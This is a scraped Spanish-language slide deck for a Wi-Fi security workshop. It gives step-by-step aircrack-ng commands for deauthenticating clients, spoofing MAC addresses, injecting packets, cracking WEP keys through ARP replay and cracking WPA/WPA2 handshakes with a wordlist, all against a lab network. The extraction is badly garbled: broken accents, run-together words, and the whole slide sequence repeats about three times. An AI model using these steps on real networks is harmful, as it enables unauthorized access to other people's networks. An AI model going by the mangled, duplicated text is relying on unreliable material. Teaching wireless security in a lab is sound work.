7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 46: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 47: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

